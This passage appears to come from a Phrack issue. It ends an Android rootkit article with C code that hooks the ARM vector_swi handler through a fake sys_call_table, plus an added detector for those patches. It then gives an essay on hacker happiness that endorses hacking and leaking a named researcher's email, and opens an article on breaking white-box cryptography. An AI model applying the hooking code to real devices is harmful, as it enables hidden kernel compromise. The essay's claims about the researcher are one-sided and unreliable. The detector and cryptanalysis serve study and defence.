	*(long *)&new_vector_swi[offset]=0xe59f8000;
	offset+=4;
	/* ldr pc, [pc, #0] */
	*(long *)&new_vector_swi[offset]=0xe59ff000;
	offset+=4;
	/* fake sys_call_table */
	*(long *)&new_vector_swi[offset]=hacked_sys_call_table;
	offset+=4;
	/* jmp original vector_swi's addr */
	*(long *)&new_vector_swi[offset]=(add_r8_pc_addr+4);
	offset+=4;
	/* __cr_alignment's addr */
	*(long *)&new_vector_swi[offset]=ldr_ip_pc_addr;
	offset+=4;

	/* change the address of vector_swi handler
	   within exception vector table */
	*(unsigned long *)vector_swi_ptr=&new_vector_swi;

	return;
}

This code finds the instruction that handles sys_call_table within the
vector_swi handler routine and copies the original contents of vector_swi
that precede it into the fake vector_swi buffer. After changing part of the
fake vector_swi so that it refers to the __cr_alignment address correctly,
we add instructions that load the address of the sys_call_table copy into
the r8 register and jump back to the original vector_swi handler function.
Finally, hooking starts when we modify the address of the vector_swi
handler function within the exception vector table.


--[ 5.3 - Hooking techniques changing branch instruction offset

The second hooking technique leaves the vector_swi handler address in the
exception vector table untouched and instead changes the offset of the
4 byte branch instruction that is executed automatically when the software
interrupt occurs.

	1. Proceed to step 4 like the way in section 5.1.
	2. Store the address of generated fake vector_swi handler routine
	   in the specific area within exception vector table.
	3. Change 1 byte which is an offset of 4 byte instruction codes at
	   0xffff0008 and store.

The code compared with section 5.2 is as follows.

- *(unsigned long *)vector_swi_ptr=&new_vector_swi;
...
+ *(unsigned long *)(vector_swi_ptr+4)=&new_vector_swi; /* 0xffff0424 */
...
+ *(unsigned long *)swi_addr+=4; /* 0xe59ff410 -> 0xe59ff414 */

The changed exception vector table after hooking is as follows.

# ./coelacanth -e
[000] ffff0000: ef9f0000 [Reset]          ; svc 0x9f0000 branch code array
[004] ffff0004: ea0000dd [Undef]          ; b   0x380
[008] ffff0008: e59ff414 [SWI]            ; ldr pc, [pc, #1044] ; 0x424
[00c] ffff000c: ea0000bb [Abort-perfetch] ; b   0x300
[010] ffff0010: ea00009a [Abort-data]     ; b   0x280
[014] ffff0014: ea0000fa [Reserved]       ; b   0x404
[018] ffff0018: ea000078 [IRQ]            ; b   0x608
[01c] ffff001c: ea0000f7 [FIQ]            ; b   0x400
[020] Reserved
... skip ...
[420] ffff0420: c003df40 [vector_swi]
[424] ffff0424: bf0ceb5c [new_vector_swi] ; fake vector_swi handler code

Hooking starts when the address of the fake vector_swi handler code is
stored at 0xffff0424 and the offset of the 4 byte branch instruction at
0xffff0008 is changed so that it references 0xffff0424.
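
Seen from the defender's side, the patches described in sections 4 to 5.3
each leave a checkable trace in the vector page or in vector_swi. The block
below is an added example, not code from the original paper or its attached
archive: it checks a snapshot of the vector page against a known-good
baseline. The snapshots are constructed from the dumps printed above; the
kernel text bounds, struct and function names are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE_WORDS (0x428 / 4)  /* snapshot covers vector offsets 0x000-0x424 */

enum {                          /* finding flags, OR-ed together */
    SWI_OK            = 0,
    SWI_BAD_OPCODE    = 1 << 0, /* expected instruction form not found        */
    SWI_SLOT_MOVED    = 1 << 1, /* ldr at 0x08 reads a different literal slot */
    SWI_HANDLER_MOVED = 1 << 2, /* slot holds a different handler address     */
    SWI_OUTSIDE_TEXT  = 1 << 3, /* handler address is outside kernel text     */
    SWI_TABLE_LDR     = 1 << 4  /* "add r8, pc, #x" is now "ldr r8, [pc, #x]" */
};

struct baseline {               /* values recorded from a known-good image */
    uint32_t slot_off;          /* literal slot used by the SWI vector */
    uint32_t handler;           /* address of vector_swi */
    uint32_t text_start, text_end; /* kernel text bounds (assumed values) */
};

/* Vector-page offset of the literal read by "ldr pc, [pc, #imm12]" at 0x08.
 * In ARM state pc reads as the instruction address plus 8.
 * Returns -1 when the word is any other instruction. */
long swi_literal_offset(uint32_t insn)
{
    if ((insn & 0xfffff000u) != 0xe59ff000u)
        return -1;
    return 0x08 + 8 + (long)(insn & 0xfffu);
}

/* Check the SWI vector and the handler address it loads against a baseline. */
unsigned check_vector_page(const uint32_t *page, size_t nwords,
                           const struct baseline *b)
{
    unsigned flags = SWI_OK;
    uint32_t handler;
    long off;

    if (nwords <= 0x08 / 4)
        return SWI_BAD_OPCODE;
    off = swi_literal_offset(page[0x08 / 4]);
    if (off < 0 || (size_t)off / 4 >= nwords)
        return SWI_BAD_OPCODE;
    if ((uint32_t)off != b->slot_off)
        flags |= SWI_SLOT_MOVED;
    handler = page[off / 4];
    if (handler != b->handler)
        flags |= SWI_HANDLER_MOVED;
    if (handler < b->text_start || handler >= b->text_end)
        flags |= SWI_OUTSIDE_TEXT;
    return flags;
}

/* Scan handler code for the first instruction that sets r8 relative to pc. */
unsigned check_table_load(const uint32_t *code, size_t nwords)
{
    for (size_t i = 0; i < nwords; i++) {
        if ((code[i] & 0xfffff000u) == 0xe28f8000u)  /* add r8, pc, #imm */
            return SWI_OK;
        if ((code[i] & 0xfffff000u) == 0xe59f8000u)  /* ldr r8, [pc, #imm] */
            return SWI_TABLE_LDR;
    }
    return SWI_BAD_OPCODE;
}

/* Constructed snapshots built from the dumps printed in the article.
 * variant 0: clean, 1: slot 0x420 overwritten, 2: offset at 0x08 bumped. */
void make_sample_page(uint32_t *page, int variant)
{
    memset(page, 0, PAGE_WORDS * sizeof(*page));
    page[0x08 / 4]  = (variant == 2) ? 0xe59ff414u : 0xe59ff410u;
    page[0x420 / 4] = (variant == 1) ? 0xbf0ceb5cu : 0xc003df40u;
    if (variant == 2)
        page[0x424 / 4] = 0xbf0ceb5cu;
}

/* Words 0x100-0x10c of vector_swi as listed, and a constructed patched copy
 * (offset 0x7c = 0x18c - 0x108 - 8, from the listing's addresses). */
const uint32_t SAMPLE_SWI_CLEAN[4] =
    { 0xe1a096adu, 0xe1a09689u, 0xe28f8094u, 0xe599c000u };
const uint32_t SAMPLE_SWI_PATCHED[4] =
    { 0xe1a096adu, 0xe1a09689u, 0xe59f807cu, 0xe599c000u };

/* Run the vector-page check on one constructed variant. */
unsigned check_sample(int variant)
{
    const struct baseline b = { 0x420, 0xc003df40u, 0xc0008000u, 0xc0400000u };
    uint32_t page[PAGE_WORDS];

    make_sample_page(page, variant);
    return check_vector_page(page, PAGE_WORDS, &b);
}

int main(void)
{
    for (int v = 0; v < 3; v++)
        printf("vector page variant %d: flags=0x%02x\n", v, check_sample(v));
    printf("vector_swi clean:   0x%02x\n", check_table_load(SAMPLE_SWI_CLEAN, 4));
    printf("vector_swi patched: 0x%02x\n", check_table_load(SAMPLE_SWI_PATCHED, 4));
    return 0;
}
```

The instruction scan is a heuristic tied to the listing shown in this
article; a kernel built differently needs its own baseline words.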


--[ 6 - Conclusion

One more time, I thank many pioneers for their devotion and inspiration.
I also hope that more Android rootkit research will follow. It is a pity
that I couldn't cover all the ideas that occurred to me while writing this
paper. However, I also think that it is better to discuss the advanced and
practical techniques next time -if you like this one ;-)-.

For more information, the attached example code provides not only file &
process hiding and kernel module hiding features but also the classical
rootkit features such as admin privilege succession to specific gid user
and process privilege changing. I referred to the Defcon 18 whitepaper of
Christian Papathanasiou and Nicholas J. Percoco for performing the reverse
connection when we receive a sms message from an appointed phone number.

Thanks to:
vangelis and GGUM for translating Korean into English. Other than those who
helped me on this paper, I'd like to thank my colleagues, people in my
graduate school and everyone who knows me.


--[ 7 - References

 [1] "Abuse of the Linux Kernel for Fun and Profit" by halflife
     [Phrack issue 50, article 05]

 [2] "Weakening the Linux Kernel" by plaguez
     [Phrack issue 52, article 18]

 [3] "RUNTIME KERNEL KMEM PATCHING" by Silvio Cesare
     [runtime-kernel-kmem-patching.txt]

 [4] "Linux on-the-fly kernel patching without LKM" by sd & devik
     [Phrack issue 58, article 07]

 [5] "Handling Interrupt Descriptor Table for fun and profit" by kad
     [Phrack issue 59, article 04]

 [6] "trojan eraser or i want my system call table clean" by riq
     [Phrack issue 54, article 03]

 [7] "yet another article about stealth modules in linux" by riq
     ["abtrom: anti btrom" in a mail to Bugtraq]

 [8] "Saint Jude, The Model" by Timothy Lawless
     [http://prdownloads.sourceforge.net/stjude/StJudeModel.pdf]

 [9] "IA32 ADVANCED FUNCTION HOOKING" by mayhem
     [Phrack issue 58, article 08]

[10] "Android LKM Rootkit" by fred
     [http://upche.org/doku.php?id=wiki:rootkit]

[11] "This is not the droid you're looking for..." by Trustwave
     [DEFCON-18-Trustwave-Spiderlabs-Android-Rootkit-WP.pdf]


--[ 8 - Appendix: earthworm.tgz.uu

I attach demo code to demonstrate the concepts which I explained in this
paper. This code can be used as real attack code or just as proof-of-concept
code. I hope you will use this code only for your study, not for a bad
purpose.


--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x07 of 0x13

|=-----------------------------------------------------------------------=|
|=-------------------------=[ Happy Hacking ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by Anonymous ]=---------------------------=|
|=-----------------------------------------------------------------------=|

                                  -------

1. Introduction

2. The Happiness Hypothesis

3. The consulting industry

4. Rebirth

5. Conclusions

6. References

                                  -------

--[ 1 - Introduction

I've been fascinated with happiness since my college days. Prior to 1998
psychology focused on fixing people who had problems in an attempt to make
them more "normal". However, recent trends in psychology have brought a
whole new field called positive psychology. Positive psychology, or the
science of Happiness, brings a wealth of research on how normal people can
achieve greater levels of happiness. As you delve into the subject you will
discover that most of the conclusions associated with the research into the
topic of happiness actually run counter to the popular culture
understanding of what brings happiness.

In this article I'd like to expose some ideas that directly impact the
hacking scene and specifically as it relates to working in the security
industry. I'd also like to introduce the idea of hacking happiness.

If you could spend a percentage of your time learning about happiness, how
much happier do you think you could be? Hacking happiness means cutting the
path to happiness straight to what makes you happy by researching happiness
just like you would any security topic.

Since the article is focused on Happiness as it relates to hacking, there
are many subjects of positive psychology that we are not going to touch or
mention. However, if you are interested in reading more about the field,
Wikipedia has an excellent article on the subject:

  - http://en.wikipedia.org/wiki/Positive_psychology


--[ 2 - The Happiness Hypothesis

Most of the ideas introduced by this article are borrowed from "The
Happiness Hypothesis" by Jonathan Haidt, which I recommend if you'd like to
dig deeper into the subject.

The first thing you should know about happiness, which research has
proved, is:

  - "People are very bad at predicting what will bring them happiness." -

To expose this idea let me provide an example. Researchers took a look at 2
different groups of people that had been through completely opposite
situations, the first group are lottery winners, and the second group are
people that became paraplegics through some type of accident. Both groups
were interviewed at 2 different times, once just after the event (winning
the lottery or becoming paraplegic), and once more again several years
later. The results of their interviews are quite astonishing.

The first group, the lottery winners, as you might expect, had very high
happiness levels when interviewed shortly after they had won the lottery.
The second group, those who were newly paralyzed had a very low level of
happiness, some were even so unhappy that they regretted not dying during
the accident. These findings are quite obvious and shouldn't be surprising
to you; however what is astonishing are the results of the second
interview.

Years later, the lottery winners were interviewed again, this time the
results were quite surprising. As it turns out, their happiness level had
dropped significantly to levels so low that most of the winners were more
unhappy now than before winning the lottery. In contrast, the happiness of
the group of paraplegics was very high, equal to or higher than before the
accident. So what really happened?

To explain this, let me describe the circumstances of the lottery winners.
Having won the lottery, they thought they had achieved everything they
wanted, since popular culture equates happiness with material wealth, and
so their short term happiness level grew quite high. After some time
though, they started to realize that the money wasn't bringing them the
happiness they once thought they would achieve when they would be rich.
Frustrated at the possibility that they would never be able to achieve full
happiness, their happiness level started dropping. To try to compensate for
their decreasing happiness level, they started spending money on material
things, but that was no longer a happiness source. Further exacerbating the
problem, this new wealth brought new problems (to quote Notorious B.I.G. -
"Mo money mo problems"). Now family, friends and colleagues were regarded
as a threat, thinking that all they wanted is to take advantage of their
new wealth. People around them started asking for loans and favors, which
led them to distance themselves from their families and friends. Again, in
order to compensate, they started trying to make new friends that had their
own wealth status. But breaking the bonds with old friends and family that
had been established for most of their lives and trying to establish new
ones, brought a feeling of loneliness that directly correlates to their
happiness levels significantly dropping.

On the other hand those who had become paraplegics relied heavily on their
families and friends to help them through the rough times, thus 
strengthening the bonds between them. And just like the lottery winners,
the new circumstances brought back old friends from the past. But unlike
with lottery winners whose friends came back looking to take advantage of
their new wealth, these old friends came back for the opposite; they sought
to help. Another factor associated with the increased happiness was the 
fact that the group that was paralyzed had to learn to cope with being 
paraplegics. Learning to cope with being paraplegics brought an immense
sense of achievement that made their happiness levels go up.  After a few
years their family relations were stronger than ever; friends were closer
and their sense of achievement from having overcome their limitations had
brought them an immense amount of happiness that, when compared to their 
happiness levels before the accident, was equal and most of the times 
higher.

If someone were to ask you whether you would choose to become paraplegic or
win the lottery, it is obvious that everyone would choose to win the
lottery; however this choice goes against research which has shown that by
becoming a paraplegic you would ultimately be happier.

Obviously I am not saying this is the path you need to choose (if you are
thinking of doing this, please stop!). I am merely trying to demonstrate
that the actual road to happiness may force you to look at things in a very
different and counter intuitive manner.


--[ 3 - The Security Industry

In recent years I've seen many hackers join the information security
industry, many of them under the illusion that hacking as their day job
will bring them a great deal of happiness. After a couple of years they
discover they no longer enjoy hacking, that those feelings they used to
have in the old days are no longer there, and they decide to blame the
hacking scene, often condemning it as "being dead".

I'll try to explain this behavior from the science of happiness point of
view.

Let me start by looking at Journalism. The science of happiness has shown
that people are happy in a profession where:

  - "Doing good (high quality work) matches with doing well (achieving 
    wealth and professional advancement) in the field." -

Journalism is one of those careers where doing good (making the world
better by promoting democracy and free press) doesn't usually lead to
rising as a journalist. Julian Assange, the chief editor of Wikileaks, is
a pretty obvious example of this. By firmly believing in free press he has
brought upon himself a great deal of trouble. In contrast, being
manipulative and exaggerating news often leads to selling more news, which
in turn allows for the sales of more ads, which correlates to doing well.
But by doing so, journalists have to compromise their beliefs, which
ultimately makes their happiness levels go down. Those who decide not to
compromise feel angry at their profession when they see those who cheat and
compromise rise high. This feeling also leads their happiness levels to
drop. Journalism is therefore one of those professions where its
practitioners tend to be the most unhappy.

Hacking on the other hand doesn't suffer from this issue. In the hacking
scene doing great work is often recognized and admired. Those hackers that
are able to write that exploit thought to be impossible, or find that
unbelievably complex vulnerability, are recognized and praised by the
community. Also, many hackers tend to develop great tools which are often
released as open source. The open source community shares a lot of
properties with the hacking community. It is not hard to see why people
enjoy developing open source projects so much. Most open source projects
are community organizations led by meritocracy; where the best programmers
can quickly escalate the ranks by writing great code. Furthermore, the idea
of making the code and the underlying designs widely available gives
participants a feeling of fulfillment as they are not doing this for profit
but to contribute to a better world. These ideals have also been an
integral part of the hacking community where one of its mottos is,
"Knowledge should be free, information should be free". Being part of such
communities brings a wealth of happiness, and is the reason why these
communities flourished without the need for any economic incentives.

Recent years however have brought the security industry closer to the 
hacking industry. Many hacking scene members have become security industry
members once their responsibilities demanded more money (e.g. married with
kids and a mortgage). For them it seemed like the right fit and the perfect
job was to hack for a living.

However, the security industry does not have the same properties as the
hacking or open source communities. The security industry is much more like
the journalism industry.

The main difference between the hacking community and the security industry
is about the consumers of the security industry. While in the hacking
community the consumers are hackers themselves, in the security industry
the consumers are companies and other entities that don't have the same
behavior as hackers. The behavior of the security industry consumers is
similar to the behavior of the consumers of journalism. This is because
these companies are partially a subset of the consumers of journalism.
These consumers do not judge work as hackers do; instead they are more
ignorant and have a different set of criteria to judge work quality.

It is because of this, that once a hacker joins the security industry they
eventually discover that doing great work no longer means becoming a better
security professional. They quickly start discovering a whole new set of
rules to achieve what is considered to be the 'optimal', such as getting
various industry certifications (CISSP, etc), over-hyping their research
and its impact to generate press coverage, and often having to compromise
their ideals in order to protect their source of income (for example the 
"no more free bugs", "no more free techniques" movements).

Those deciding that they don't want to be a part of this quickly realize
that the ones who do are the ones that rise up. Most of them try to fix the
situation by calling these people out, which often makes the person being
called out likely to be criticized by the hacking community. But that is
often not the case within the security industry, where they still enjoy a
great deal of success.

To illustrate further, it has become very prevalent to announce discoveries
and claim that by making the vulnerability details public catastrophic
consequences would ensue, as we'll see in the example below. Most of the
hacking community are quick to criticize this behavior, often ostracizing
the person making the claim, and in a few cases hacking them in an
attempt to publicly expose them. However, this practice only has an impact
within the hacking community. In the security industry an opposite effect
happens and the person in question achieves a higher status that allows
him to present in the top security industry conferences. This person is
also praised for choosing to responsibly disclose the vulnerability thus
obtaining an overall security status of guru.

To illustrate this let's look at a real world example. On July 28, 2009, 
during the Las Vegas based Black Hat Briefings industry conference, the
ZF05 ezine was released. The ezine featured a number of well respected
security researchers and how they were hacked. But one of these researchers
stood out, namely Dan Kaminsky. The reason why he stood out was that one
year before, a couple of months before Black Hat Briefings, Dan Kaminsky
decided to announce that he had a critical bug on how DNS servers
operated [0].

Moreover he announced that he had decided, for the benefit of Internet
security, to release the technical details only during his Black Hat
Briefings speech that year. The response to this decision was very
polarized. On one side there was the "vendor" and information security
industry that praised Dan for following responsible disclosure. On the
other hand, some of the more prominent security people criticized this
approach [1].

Dan in turn positioned himself as a martyr, stating that everyone was going
against him, but he was willing to sacrifice himself in order to protect
the Internet.

When ZF05 was released, Dan Kaminsky's email spool and IRC logs were
published in it. The released data included a number of emails he exchanged
during the time he released the DNS bug. The emails showed exactly what
everyone in the hacking community already knew; that Dan Kaminsky was
anything but a martyr, and that everything was a large publicity stunt [2].

Even though the data were completely embarrassing and publicly exposed Dan
Kaminsky for what he really was, a master at handling the press, this had
no impact outside of the hacking community. That year, again, Dan Kaminsky
took a stand in the Black Hat Briefings conference to deliver a talk, and
was again praised. He was also later chosen to be the American
representative who holds the backups of the global DNS root keys [3].

This demonstrates that no matter how severe a security industry figure gets
owned by hackers literally (e.g. publishing their email spools and IRC 
logs) or figuratively (e.g. showing qualitative evidence that their
research is flawed, stolen, inaccurate or simply unoriginal), these
individuals continue to enjoy a great deal of respect from the security
industry. To quote Paris Hilton, "There's no such thing as bad press".

With time those that choose not to compromise either live an unhappy life
frustrated by these so called "hackers" that get their recognition from the
security industry while they themselves are seen as security consultants 
who just can't market themselves, or they simply choose to change their 
entire career, often burned out and proclaiming that hacking is dead.


--[ 4 - Rebirth

Since the idea behind this paper is not to expose anyone, or complain about
the security industry, we want to leave this aside and move on to what
exactly a hacker can do to hack happiness.

The rebirth section is then a logical reasoning exercise on the different
paths that are available to a hacker who is also part of the information 
security consulting community, as seen from the happiness maximization 
perspective.

The first path is to keep fighting. This path is quite popular; over the
years we have seen many hackers forming groups and following this path (el8,
h0n0, Zero for 0wned, project m4yh3m, etc). But don't get too excited since
most of the teams that follow this path eventually disintegrate; I'll try
to explain the reasons why this happens. First, remember that humans are
very bad at predicting what would bring them happiness. With that in mind,
most of these groups form with the ideal of exerting a big change onto the
security community. The problem with this approach is that they really have
no control over the consumers of the industry, which is exactly where the
problem really is. As these groups try to exert a change they quickly
discover that even when their actions lead to undeniable proof of their
arguments and are completely convincing to other hackers, they don't seem
to affect regular people. Their initial victories and support from the
hacking community will bring them a new wave of happiness, but as time goes
by, frustration from not being able to have an impact beyond the hacker
community will start to build up, which causes their level of happiness to
drop, eventually disintegrating the group. You would be wise, if you are
thinking of taking this path, not to take my word for it, but
just look at the history of the groups that precede you, and then decide.

Your other path is simply to ignore all of this and just keep working on
the sidelines as a security consultant. As someone who was once part of the
security industry - being on the sidelines without compromising my ideals
while I saw others who had little skill rise - I can honestly tell you
it will make you sick. For some people, professional success is a very
important part of their overall happiness. So if you choose to follow this
path first make sure that professional success is not a very important part
of your life. If that is the case, instead focus on other activities from
which you can derive happiness. One great choice is participating in open
source projects, or building one yourself. There are of course many other
alternatives like family, sports etc, all of which can bring you immense
happiness. On the other hand, if your personality is that of someone very
ambitious, following this path will make you very unhappy for obvious
reasons.

Finally there is one more path. Simply accepting this is how the security
industry works (these are the rules of the game), and playing the game. In
this scenario, as you begin to rise you will discover that in order to
move higher you are going to have to make some ethical compromises, and by
doing so to rise up in the information security industry. Unfortunately,
even though your professional success will bring some happiness with it,
you will start to feel as if you sold your "soul" to the devil. This
feeling will start bringing your happiness levels down, and the more you 
compromise the bigger impact this will have. At the same time, you will 
start hating your job for forcing you to compromise your ideals. This in 
effect will cause your professional success to no longer bring you any 
happiness. The combination of both hating your job and compromising your 
ideals will bring your happiness levels very low. Eventually you will
falsely reach the conclusion that you no longer like hacking, that hacking
is dead, and this is why you feel so unhappy.

Fortunately for you, the security industry is not the only option. Your
skills and intelligence will be valued in different industries. It is up to
you to decide what kind of career you would like to pursue. Many hackers 
choose to work as software engineers, which is a very good option since 
they already possess a great deal of knowledge in this area. But you are not
restricted to the software engineering industry. In fact I've seen cases
where hackers have chosen careers that have nothing to do with computing,
far away actually, such as music or art, and they are quite successful and 
happy.

This does not mean you are giving up on hacking; in fact it is quite the
opposite. Many people, including myself, do hacking as a hobby and choose
to participate in a different industry for our living income. If you choose
this path you will realize that being part of this community will bring
you a lot of happiness. Deep inside you already know this if you are 
reading this article. The real reason you started hacking in the first 
place was not because you were good at it, or because you liked computers;
it was because it made you happy and there is no reason why this has to
change.

For those of you that have been in the security industry for a while, who
are unhappy with the current situation and are blaming the hacking
community for this, don't. Understand that it is not the hacking community 
which has problems but the security industry and that once you start 
hacking as a hobby again those feelings you once had will come back.


--[ 5 - Conclusions

I hope I brought some understanding to what makes people happier, what you
should look for in any industry you seek to work in if you want to maximize
your happiness, and more importantly how the security industry behaves. 

Hopefully some of you will be able to make better decisions, and ultimately
the conclusion should be:

  - Hacking will never die, because ultimately we all want happiness, and
    hacking brings happiness. -

HAPPY HACKING!


--[ 6 - References

[0] http://dankaminsky.com/2008/07/09/an-astonishing-collaboration/
[1] https://lists.immunityinc.com/pipermail/dailydave/2008-July/005177.html
[2] http://attrition.org/misc/ee/zf05.txt
[3] http://www.root-dnssec.org/tcr/selection-2010/


--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x08 of 0x13

|=-----------------------------------------------------------------------=|
|=--------=[ Practical cracking of white-box implementations  ]=---------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ by SysK - whiteb0x [o] phrack o org ]=---------------=|
|=-----------------------------------------------------------------------=|


                                  -------

  1 - Introduction

  2 - What is a WB implementation?

  3 - The things you should know about white-boxes
    3.1 - Products available
    3.2 - Academic state of the art

  4 - Handling the first case: hack.lu's challenge
    4.1 - The discovery step
    4.2 - The key recovery
    4.3 - Random thoughts

  5 - White-boxing the DES
    5.1 - The DES algorithm
    5.2 - An overview of DES WB primitives

  6 - Breaking the second case: Wyseur's challenge
    6.1 - Efficient reverse engineering of the binary
    6.2 - The discovery step
    6.3 - Recovering the first subkey
    6.4 - Recovering the original key

  7 - Conclusion

  8 - Gr33tz

  9 - References

 10 - Appendix: Source code

                                  -------


--[ 1 - Introduction


    This paper is about WB (white-box) cryptography. You may not have heard
too much about it but if you're focused on reverse engineering and more
precisely on software protections, then it may be of interest for you.

    Usually the common way to learn something valuable in cryptography is
either to read academic papers or cryptography books (when they're written
by true cryptographers). However as cryptography is about maths, it can
sometimes seem too theoretical for the average reverser/hacker. I'm willing
to take a much more practical approach using a combination of both reverse
engineering and elementary maths.

    Obviously such a paper is not written for cryptographers but rather for
hackers or crackers unfamiliar with the concept of white-box and willing to
learn about it. Considering the quasi non existence of public
implementations to play with as well as the 'relatively' small amount of
valuable information on this subject, I hope this will be of interest. Or
at the very least that it will be a pleasant read... O:-)


--[ 2 - What is a WB implementation?


    So let's begin with a short explanation. A white-box is a particular
implementation of a cryptographic primitive designed to resist the
examination of its internals. Consider the case of a binary embedding (and
using) a symmetric primitive (such as AES for example). With the common
implementations, the AES key will always leak in memory at some point of
the execution of the program. This is the classic case of a reverser using
a debugger. No matter how hard it may be (anti-debug tricks, obfuscation of
the key, etc.), he will always find a way to intercept the key. White-box
cryptography techniques were designed to solve this problem, which is
very common, especially in the field of DRM (Digital Rights Management).

    So how does it work? The main concept that you should remember is that
the key is never explicit. Or you could say that it's mathematically
transformed or 'fused' with the encryption routine. So for one key there is
one particular obfuscated primitive which is strictly equivalent to the
original one*. For a same input, both implementations will produce an
identical output. The mathematical transformation is designed in such a way
that an attacker with a debugger will not be able to deduce the key from
the internal state ... at least in a perfect world :-)

*: It's not 'exactly' true as we will see later with external encodings.

    Confused? Then take a look at this tiny example:

      -> Function1: for x in [0:3] f(x) = (k+x) % 4
      -> Function2: for x in [0:3] g(x) = S[x] with S = [3,0,1,2]

    If k==3, then the two functions f() and g() are equivalent. However the
first one explicitly uses the key 'k' whereas the second one doesn't, being
implemented as a lookup table (LUT). You could say that g() is a white-box
implementation of f() (albeit a very weak one) for the key 3. While this
example is easy to understand, you will soon discover that things are more
complicated with the obfuscation of a whole real life crypto primitive.
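
    The toy f()/g() pair above, extended as an added example (not code from
the original article): it fuses each key into a table, then counts how many
keys are compatible with a bare table versus a table wrapped in an output
encoding. The bijection E_DEMO and all function names are constructed for
this illustration, and the encoded case goes one step beyond the text's
example to show why the footnote says equivalence is no longer exact.

```c
#include <stdint.h>
#include <stdio.h>

#define N 4   /* domain of the article's toy example: x in [0:3] */

/* Keyed reference function from the text: f(x) = (k + x) % 4. */
static uint8_t f(int k, int x) { return (uint8_t)((k + x) % N); }

/* Toy "generator": fuse key k into a table so only S ships, never k. */
void make_table(int k, uint8_t S[N])
{
    for (int x = 0; x < N; x++)
        S[x] = f(k, x);
}

/* Table-only evaluation: g(x) = S[x]. */
uint8_t g(const uint8_t S[N], int x) { return S[x]; }

/* How many keys reproduce exactly this table? For a bare table the
 * answer is always 1 (in fact k == S[0]), which is why the article
 * calls this construction "very weak". */
int keys_matching_plain(const uint8_t S[N])
{
    int count = 0;
    for (int k = 0; k < N; k++) {
        int ok = 1;
        for (int x = 0; x < N; x++)
            if (f(k, x) != S[x]) ok = 0;
        count += ok;
    }
    return count;
}

/* Wrap the table in an output encoding E (a bijection): T[x] = E[S[x]].
 * T is no longer equal to f(); the consumer must undo E elsewhere. */
void encode_table(const uint8_t S[N], const uint8_t E[N], uint8_t T[N])
{
    for (int x = 0; x < N; x++)
        T[x] = E[S[x]];
}

/* How many keys k' are consistent with T for SOME unknown bijection E'?
 * E' is forced to be E'[f(k',x)] = T[x]; k' is consistent when that E'
 * is itself a bijection on [0:3]. */
int keys_matching_encoded(const uint8_t T[N])
{
    int count = 0;
    for (int k = 0; k < N; k++) {
        uint8_t Ep[N];
        int seen[N] = {0};
        int ok = 1;
        for (int x = 0; x < N; x++)
            Ep[f(k, x)] = T[x];
        for (int y = 0; y < N; y++) {
            if (Ep[y] >= N || seen[Ep[y]]++) ok = 0;
        }
        count += ok;
    }
    return count;
}

/* Constructed output encoding, used only for this demonstration. */
const uint8_t E_DEMO[N] = {2, 0, 3, 1};

int main(void)
{
    uint8_t S[N], T[N];
    make_table(3, S);                 /* the article's S = [3,0,1,2] */
    encode_table(S, E_DEMO, T);
    printf("bare table:    %d candidate key(s)\n", keys_matching_plain(S));
    printf("encoded table: %d candidate key(s)\n", keys_matching_encoded(T));
    return 0;
}
```
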


--[ 3 - The things you should know about white-boxes


             <<<<<<<<<<<<<<<<<< DISCLAIMER <<<<<<<<<<<<<<<<<<
             > I will voluntarily not enter into too much   <
             > details. As I said, the paper is based on a  <
             > practical approach so let's avoid the maths  <
             > for the moment.                              <
             >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


----[ 3.1 Products available


    WB cryptography is essentially implemented in commercial security
products by a relatively small number of companies (Cloakware -acquired by
Irdeto-, Whitecryption, Arxan, Syncrosoft, etc.). Usually they provide a
secure API which is then integrated into other security primitives, often
for DRM purposes. Amongst other things, they design WB primitives for
symmetric encryption (DES, AES) but also MAC (HMAC, CMAC) and asymmetric
primitives (ECC, RSA, DSA).

    How often do we come across WB in the wild? More than you could think
of! For example you can see in [R10] that Irdeto has many famous customers
including TI, Sony, Adobe and NetFLIX. WB cryptography will most likely
become more and more present in software protections.

    As far as I can tell, there are unfortunately only 2 public (non
commercial) examples of WB implementations, both with undisclosed
generators:

    - The first historical one is a binary available on Brecht Wyseur's
      website [R04] and is a WB DES implementation. Brecht challenges
      people to find the key:

      "If you like, try to extract the secret key, using all information
       you can find from this implementation (besides brute-force black-box
       attacks of course)."

      Keep in mind that this is a challenge, not some production code.

    - The second one less likely to be known is a challenge proposed by Jb
      for the 2009 edition of hack.lu [R02]. This one is a simplistic AES
      WB but was never labeled officially as such. Part of the challenge is
      indeed to find out (oops!).

    The cryptanalysis involved is obviously far below the academic state of
the art but it's nonetheless an interesting one and a first step for anyone
who wants to be serious and aims at defeating more robust implementations.

    We'll study both starting with Jb's binary and see how the solution can
be found in each case.

                           ,---.
                        ,.'-.   \
                       ( ( ,'"""""-.
                       `,X          `.
                       /` `           `._
                      (            ,   ,_\
                      |          ,---.,'o `.
                      |         / o   \     )
                       \ ,.    (      .____,
                        \| \    \____,'     \
                      '`'\  \        _,____,'
                      \  ,--      ,-'     \
                        ( C     ,'         \
                         `--'  .'           |
                           |   |         .O |
                         __|    \        ,-'_
                        / `L     `._  _,'  ' `.
                       /    `--.._  `',.   _\  `
                       `-.       /\  | `. ( ,\  \
                      _/  `-._  /  \ |--'  (     \
                     '  `-.   `'    \/\`.   `.    )
                           \  -hrr-    \ `.  |    |


----[ 3.2 Academic state of the art


    AFAIK academic publications are limited to symmetric encryption and
especially to DES and AES (though SPN case is somewhat extended in [R08]).
Explaining the history of the design and the cryptanalysis techniques which
were developed would be complicated and is already explained with great
details in the thesis of Brecht Wyseur [R04].

    The main question is to know if there exists a secure WB design and if
you consider the current state of the art in cryptography, well... there
isn't! There is currently no implementation proposal not broken by design.
And in this case, broken means a key recovery in a matter of seconds in the
worst case. Yes, _that_ broken!

    However, real-life white-box cryptography may be different because:

        - As explained before, proprietary implementations of algorithms
          not mentioned in any paper (MAC algorithms, asymmetric ones)
          exist. This proves that people were smart enough to design new
          implementations. On the other hand, without any formal analysis
          of these implementations, nothing can be said regarding their
          effective security.

        - Cloakware products were at least partially designed/written by
          the cryptographers who designed the first white-box [R7]. On one
